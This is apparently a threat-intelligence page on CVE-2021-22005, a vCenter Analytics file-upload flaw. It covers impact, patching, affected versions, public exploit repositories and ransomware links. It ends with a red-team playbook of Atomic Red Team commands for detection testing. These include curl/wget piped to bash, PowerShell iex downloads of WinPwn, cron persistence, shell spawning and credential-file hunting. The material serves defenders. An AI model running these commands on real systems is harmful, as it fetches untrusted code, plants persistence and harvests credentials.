CVE-2021-22005
Overview
This vulnerability is an arbitrary file upload flaw rooted in insufficient validation of uploaded files within the Analytics service of VMware vCenter Server and VMware Cloud Foundation. The affected component improperly processes files sent to the telemetry API endpoint, allowing crafted files to bypass security checks. The flaw resides in the handling of HTTP POST requests to the Analytics telemetry service over port 443, enabling unauthorized file injection into the server environment.
Vulnerability Description
The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
Impact
An attacker with network access to port 443 can upload and execute arbitrary code on the vCenter Server without any authentication or user interaction. This results in full system compromise, allowing unauthorized control over the virtual infrastructure management platform. The attacker can manipulate virtual machines, access sensitive configuration data, and potentially move laterally within the network, severely impacting business operations and data confidentiality.
Solution
VMware has released security updates addressing this vulnerability in advisory VMSA-2021-0020. Affected products include VMware vCenter Server versions 6.5, 6.7, and 7.0, as well as VMware Cloud Foundation. Administrators should apply the patches provided in the advisory immediately. Detailed patching instructions and additional mitigation guidance are available at https://www.vmware.com/security/advisories/VMSA-2021-0020.html.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The arbitrary file upload vulnerability present in the Analytics service of vCenter Server allows an attacker with network access to exploit the system by uploading a specially crafted file. This flaw arises from insufficient validation of user-supplied input, enabling the execution of arbitrary code on the server. The vulnerability is particularly concerning due to its high CVSS score of 9.8, indicating a critical risk level. The affected versions of vCenter Server, including 6.5, 6.7, and 7.0, as well as VMware Cloud Foundation, are widely used in enterprise environments, making this vulnerability a significant target for malicious actors.
Attack vectors for this vulnerability primarily involve an attacker gaining access to port 443, which is typically used for secure HTTPS communication. Once access is obtained, the attacker can upload a malicious file that the server may execute, leading to unauthorized code execution. This could be achieved through various means, such as phishing attacks, exploiting other vulnerabilities to gain initial access, or leveraging weak network security practices. Once the attacker has executed code on the server, they could potentially gain control over the entire vCenter Server, manipulate virtual machines, exfiltrate sensitive data, or disrupt services.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on virtualized environments for critical operations. Successful exploitation could lead to unauthorized access to sensitive information, including customer data, intellectual property, and proprietary business processes. Furthermore, the ability to manipulate virtual machines could result in service disruptions, data loss, and significant financial repercussions. The reputational damage from a breach of this nature can also be profound, as customers and partners may lose trust in an organization’s ability to safeguard their data.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected products is crucial to close the window of opportunity for attackers. Network segmentation can help limit access to the vCenter Server, ensuring that only authorized personnel can reach port 443. Additionally, organizations should employ intrusion detection systems (IDS) to monitor for unusual activity and potential exploitation attempts. Conducting regular security assessments and penetration testing can also help identify and remediate vulnerabilities before they can be exploited.
In conclusion, the arbitrary file upload vulnerability in the Analytics service of vCenter Server poses a critical threat to organizations utilizing this technology. The potential for unauthorized code execution can lead to severe operational, financial, and reputational consequences. By understanding the technical details of the vulnerability, recognizing possible attack vectors, and implementing robust detection and mitigation strategies, organizations can better protect themselves against this and similar threats. It is imperative for businesses to prioritize cybersecurity measures to safeguard their virtual environments and maintain the integrity of their operations.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2021-22005, evidenced by the emergence of multiple new proof-of-concept exploits and the release of a Metasploit module that significantly lowers the technical barrier for attackers. This development has coincided with the vulnerability’s formal inclusion in the CISA KEV catalog, underscoring its criticality and elevating its visibility among defenders. Our telemetry indicates a sharp increase in exploitation attempts, reflecting growing adversary interest and operationalization of this vulnerability. Notably, ransomware groups such as Akira have been linked to campaigns leveraging this flaw, signaling an increased risk of ransomware deployment following successful exploitation. The EPSS score reaching near certainty further validates the heightened likelihood of exploitation in the wild. Collectively, these factors elevate the threat level from theoretical to actively exploited, demanding heightened vigilance from defenders monitoring vCenter Server environments.
Update 2 — July 08, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2021-22005, indicating increased adversary engagement with this critical VMware vCenter Server vulnerability. This uptick in telemetry suggests that threat actors, including ransomware groups linked to this exploit, are intensifying their operational use of the arbitrary file upload flaw. Concurrently, new proof-of-concept exploits have surfaced on public repositories, broadening the toolkit available to attackers and lowering the barrier for exploitation. While the EPSS score remains at a near-maximum level, the sustained and growing exploitation attempts underscore a persistent and evolving threat landscape. For defenders, this development signals an elevated risk posture, as the vulnerability continues to be actively targeted with increasing sophistication and frequency, reinforcing the urgency of vigilant monitoring and response within affected environments.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.5 |
cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 6.7 |
cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*
|
|
|
Vmware | Vcenter Server | 7.0 |
cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
VMware vCenter Server Analytics (CEIP) Service File Upload
exploits/linux/http/vmware_vcenter_analytics_file_upload
|
George Noseevich, Sergey Gerasimov, VMware +2 | Unknown | - | View |
GitHub PoCs (11)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
shmilylty/cve-2021-22005-exp
|
shmilylty | 194 | 45 | 2021-12-18 | View |
|
rwincey/CVE-2021-22005
|
rwincey | 37 | 22 | 2021-09-28 | View |
|
TaroballzChen/CVE-2021-22005-metasploit
the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerabilit...
|
TaroballzChen | 22 | 7 | 2021-10-02 | View |
|
Jun-5heng/CVE-2021-22005
VMware vCenter Server任意文件上传漏洞 / Code By:Jun_sheng
|
Jun-5heng | 21 | 5 | 2021-10-27 | View |
|
5gstudent/CVE-2021-22005-
CVE-2021-22005批量验证python脚本
|
5gstudent | 13 | 7 | 2021-09-25 | View |
|
1ZRR4H/CVE-2021-22005
|
1ZRR4H | 8 | 2 | 2021-09-23 | View |
|
tiagob0b/CVE-2021-22005
|
tiagob0b | 2 | 3 | 2021-10-24 | View |
|
pisut4152/Sigma-Rule-for-CVE-2021-22005-scanning-activity
|
pisut4152 | 1 | 1 | 2021-09-23 | View |
|
RedTeamExp/CVE-2021-22005_PoC
CVE-2021-22005_PoC
|
RedTeamExp | 1 | 1 | 2021-09-27 | View |
|
Jeromeyoung/VMWare-CVE-Check
CVE-2021-22005
|
Jeromeyoung | 0 | 1 | 2021-09-24 | View |
|
InventorMAO/cve-2021-22005
cve-2021-22005vcenter任意文件上传漏洞,可直接上传冰蝎
|
InventorMAO | 0 | 0 | 2022-06-21 | View |
Threat Feed
13 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22005 |
| vmware.com |
GitHub CVE
x_refsource_MISC
|
https://www.vmware.com/security/advisories/VMSA-2021-0020.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22005 |